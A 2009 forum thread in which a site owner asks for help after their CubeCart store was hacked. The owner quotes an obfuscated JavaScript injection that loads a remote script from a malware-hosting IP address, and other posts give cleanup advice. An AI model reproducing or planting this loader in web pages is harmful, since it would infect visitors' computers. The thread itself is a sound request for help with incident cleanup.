Guest fandango Posted April 28, 2009 Share Posted April 28, 2009 Hi folks, i had my site hacked recently and have found the following inline script just below my </head> tag on every page. The pages take ages to load and it also tries to pull in an external ip address as per below. The ip address has a nasty virus on it which in turn reinfects visitors computers. What my question is, is does anyone know what is and where a common place to insert a inline script would be? Cos i cant find it anywhere to remove it. <!-- document.write(unescape('xcV%3Ck3scxcVrirBtptrBt%20sk3rxcVc%3D%2FPW%2F94%2E24k37%2E2%2E1k395rBt%2FPWjxcVquerBtryPW%2ENmjk3s%3E%3C%2FscrxcVipxcVt%3E').replace(/Nm|rBt|xcV|UEJ|PW|hP|k3/g,"")); --> DO NOT VISIT!!!!! THIS IS A MALWARE SITE AND YOUR PC WILL GET INFECTED: 94.247.2.195/jquery.js Quote Link to comment Share on other sites More sharing options...
Robsta Posted April 28, 2009 Share Posted April 28, 2009 If it's not in the skin's global templates, you'll need to check all the PHP files, start in the root of the store and then work through the includes files. Quote Link to comment Share on other sites More sharing options...
Guest fandango Posted April 29, 2009 Share Posted April 29, 2009 Thanks Robsta, Have cleaned my pc for infections and sent all fresh cc files to the server but it seemed to have no effect, so in the end have had to uninstall and reinstall cc3 which has done the trick. Wish i had done an upto date back up now. I think this one is a particularly nasty piece of work. Hackers they are the 's spawn. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.